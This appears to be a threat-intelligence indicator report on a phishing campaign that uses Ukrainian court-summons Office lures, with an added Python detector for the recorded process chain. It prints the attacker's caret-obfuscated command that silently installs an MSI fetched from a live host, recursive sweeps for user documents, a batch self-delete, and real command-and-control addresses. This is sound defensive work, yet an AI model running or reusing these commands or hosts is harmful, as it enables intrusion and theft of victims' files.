- #IOC #OptiData #VR #Autoit #MSI #CDFv2
- https://pastebin.com/qHHUgBNK
- previous_contact:
- 12/04/21 https://pastebin.com/yBpP4PPw
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083
- attack_vector
- --------------
- email > attached .doc & .xlam > decrypted with password from the mail > VBA macro > GET MSI > %appdata%\Josh Close\CsvHelper\csvhelper.exe > exfil to 45.146.165.91:8080
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 4acfcccf535da0686c8343c7eeb0c450e6021fca20a9b1a02211aaf0e6c9dc13
- File name Повістка_до суду - Михайло Васильович №3.doc (Court summons - Mykhailo Vasyliovych No.3.doc) [ CDF V2 Document ] - bad password or corrupted; could not extract
- File size 263.50 KB (269824 bytes)
- SHA-256 882597c251905f9be31352ba034835764124c9a9e25ef1ba0150e5998c621f07
- File name копії судових документів - Мих.xlam (copies of court documents - Mykh.xlam) [ CDF V2 Document ]
- File size 22.00 KB (22528 bytes)
- SHA-256 8c8ef518239308216d06b4bf9b2771dbb70759cb1c9e6327a1cd045444f2b69a
- File name копії судових документів - Мих.xlam (copies of court documents - Mykh.xlam) [ Office Open XML Spreadsheet ]
- File size 15.79 KB (16164 bytes)
- SHA-256 e9a858127f5f6e5e0e94ed655a2bf9ed228f87bc99d9b12113e27dcc84be3909
- File name 240721-1.msi [ Windows Installer ]
- File size 6.46 MB (6770688 bytes)
- SHA-256 700b05fede8afe3573b6fec81452d4b09c29adb003cdacb762c8b53d84709901
- File name se1.exe [ PE32 executable for MS Windows ] compiler/packer signature: BobSoft Mini Delphi -> BoB / BobSoft
- File size 16.47 MB (17274187 bytes)
- SHA-256 17c3cf5742d2a0995afb4dd2a2d711abe5de346abde49cf4cf5b82c14e0a155f
- File name csvhelper.exe [ PE32 executable for MS Windows ]
- File size 6.93 MB (7266816 bytes)
- activity
- **************
- PL_SCR http://2215.site/240721-1.msi
- C2 45.146.165.91:8080/upld/
- netwrk
- --------------
- 45.146.165.91 2215.site GET /240721-1.msi HTTP/1.1 Windows Installer
- 45.146.165.91 45.146.165.91:8080 POST /upld/AC38D1C7 HTTP/1.1 (application/upload) Mozilla/4.0
- comp
- --------------
- msiexec.exe 2504 TCP 45.146.165.91 80 ESTABLISHED
- csvhelper.exe 3132 TCP 45.146.165.91 8080 ESTABLISHED
- csvhelper.exe 3132 TCP 45.146.165.91 8080 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
- C:\Windows\SysWOW64\cmd.exe /c P^i^ng 127.0.0.1 -n 66 > nuL && m^S^Ie^X^e^C /i http://2215.site/240721-1.msi /qn
- C:\Windows\SysWOW64\PING.EXE 127.0.0.1 -n 66
- C:\Windows\SysWOW64\msiexec.exe /i http://2215.site/240721-1.msi /qn
- C:\Windows\system32\msiexec.exe /V
- C:\Windows\syswow64\MsiExec.exe -Embedding 5603E1E9BABB29850E6EDC59A79FB67D
- "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
- C:\tmp\MW-e311c016-8944-4faf-b4a3-b4689444f124\files\se1.exe
- C:\Users\operator\AppData\Roaming\Josh Close\CsvHelper\csvhelper.exe
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.doc" /S /B /A
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.pdf" /S /B /A
- ...
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.7z" /S /B /A
- C:\Windows\SysWOW64\cmd.exe cmd /c start /min r.bat
- C:\Windows\system32\cmd.exe /K r.bat
- C:\Windows\SysWOW64\cmd.exe /min /c del "C:\Users\operator\AppData\Roaming\Josh Close\CsvHelper\r.bat"
- C:\Windows\SysWOW64\taskkill.exe /IM cmd.exe /F
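Added example (not part of the original paste): a small Python detector for the process chain recorded in the proc section above. It undoes the cmd.exe caret escaping seen in the EXCEL.EXE child (P^i^ng, m^S^Ie^X^e^C), then flags an Office process spawning a script host, msiexec installing an MSI straight from a URL with /qn, the recursive DIR sweeps for user documents, and the r.bat self-delete. The sample events at the bottom are constructed records modelled on the proc lines; the extension list and the parent/child name sets are assumptions, not data from the paste.

```python
import re

# Indicators taken from the paste's 'activity' / 'netwrk' sections.
IOC_HOST = "2215.site"
IOC_IP = "45.146.165.91"

# Assumptions for the example: which parents/children to pair, and which
# extensions count as "documents" when a DIR sweep is seen.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOC_EXTS = {"doc", "docx", "xls", "xlsx", "pdf", "txt", "rtf", "zip", "rar", "7z"}

MSIEXEC_URL = re.compile(r"msiexec(?:\.exe)?\s+.*?/i\s+(https?://\S+)", re.I)
QUIET_FLAG = re.compile(r"/q[nb]?\b", re.I)
DIR_SWEEP = re.compile(r'\bDIR\s+"?[^"\s]*\*\.(\w+)"?', re.I)
DEL_BAT = re.compile(r"\bdel\b.*\.bat", re.I)


def decaret(cmdline: str) -> str:
    """Undo cmd.exe caret escaping. Outside double quotes a ^ makes the next
    character literal (P^i^ng -> Ping, m^S^Ie^X^e^C -> mSIeXeC); inside double
    quotes cmd.exe keeps the ^ as-is, so it is kept here too."""
    out = []
    in_quote = False
    i = 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == '"':
            in_quote = not in_quote
            out.append(c)
        elif c == "^" and not in_quote and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])
            i += 1
        else:
            out.append(c)
        i += 1
    return "".join(out)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> list:
    """Findings for one process-creation record (keys: parent, image, cmdline).
    An empty list means nothing in the record matched."""
    parent = _basename(event.get("parent", ""))
    image = _basename(event["image"])
    raw = event["cmdline"]
    clean = decaret(raw)  # match against the de-obfuscated command line
    hits = []

    if image == "cmd.exe" and clean != raw:
        hits.append("caret-obfuscated cmd line")

    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office-spawned " + image)

    m = MSIEXEC_URL.search(clean)
    if m:
        tag = "msiexec remote install"
        if QUIET_FLAG.search(clean):
            tag += " (quiet)"
        if IOC_HOST in m.group(1) or IOC_IP in m.group(1):
            tag += " [known IOC]"
        hits.append(tag)

    if image == "cmd.exe":
        d = DIR_SWEEP.search(clean)
        if d and d.group(1).lower() in DOC_EXTS and re.search(r"/S\b", clean, re.I):
            hits.append("recursive document sweep for *." + d.group(1).lower())
        if DEL_BAT.search(clean):
            hits.append("batch file self-delete")
    return hits


# Constructed sample records modelled on the proc section (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c P^i^ng 127.0.0.1 -n 66 > nuL && m^S^Ie^X^e^C /i http://2215.site/240721-1.msi /qn"},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r"C:\Windows\SysWOW64\msiexec.exe /i http://2215.site/240721-1.msi /qn"},
    {"parent": r"C:\Users\operator\AppData\Roaming\Josh Close\CsvHelper\csvhelper.exe",
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.doc" /S /B /A'},
    {"parent": r"C:\Windows\system32\cmd.exe",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'C:\Windows\SysWOW64\cmd.exe /min /c del "C:\Users\operator\AppData\Roaming\Josh Close\CsvHelper\r.bat"'},
    {"parent": r"C:\Windows\explorer.exe",  # benign control record
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd.exe /c dir "C:\Users\operator\Documents"'},
]


def run_sample() -> dict:
    """Map each sample record's index to its findings."""
    return {i: analyze(e) for i, e in enumerate(SAMPLE_EVENTS)}


if __name__ == "__main__":
    for i, hits in run_sample().items():
        print(i, SAMPLE_EVENTS[i]["cmdline"], "->", hits or "clean")
```

The caret stripping is the part worth keeping: string-matching "msiexec /i http" against the raw command line would miss the EXCEL.EXE child entirely, while matching after decaret() catches it and still lets the quoted paths through untouched.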
- persist
- --------------
- n/a
- drop
- --------------
- %tmp%\MW-e311c016-8944-4faf-b4a3-b4689444f124\files\se1.exe
- %appdata%\Josh Close\CsvHelper\csvhelper.exe
- # # #
- VT details
- https://www.virustotal.com/gui/file/8c8ef518239308216d06b4bf9b2771dbb70759cb1c9e6327a1cd045444f2b69a/details
- https://www.virustotal.com/gui/url/5cb4eaeb4d3c3a0d086bcc60b1f4a2d0247cbb78a14f5818e1ae3681b3c75aab/details
- https://urlscan.io/result/ddba54d9-71b0-447e-8882-3c4f1cecb4f2/
- https://www.virustotal.com/gui/file/e9a858127f5f6e5e0e94ed655a2bf9ed228f87bc99d9b12113e27dcc84be3909/details
- https://www.virustotal.com/gui/file/700b05fede8afe3573b6fec81452d4b09c29adb003cdacb762c8b53d84709901/details
- https://www.virustotal.com/gui/file/17c3cf5742d2a0995afb4dd2a2d711abe5de346abde49cf4cf5b82c14e0a155f/details
- https://analyze.intezer.com/analyses/8fc75e5a-ef6e-48a1-8510-e8945272b9dc
- https://analyze.intezer.com/analyses/fc99be4a-a1aa-4c62-a31c-630fd2a5bfbc
- VR